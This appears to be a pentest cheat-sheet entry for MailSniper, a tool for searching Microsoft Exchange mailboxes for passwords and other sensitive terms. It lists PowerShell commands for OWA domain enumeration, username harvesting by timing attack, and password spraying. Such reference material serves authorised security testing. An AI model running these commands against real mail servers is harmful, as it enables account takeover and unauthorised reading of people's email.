Description[1]
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.
Commands[2]
# Enumerate Netbios name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com
# Uses timing attack to validate possible usernames with OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt
# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234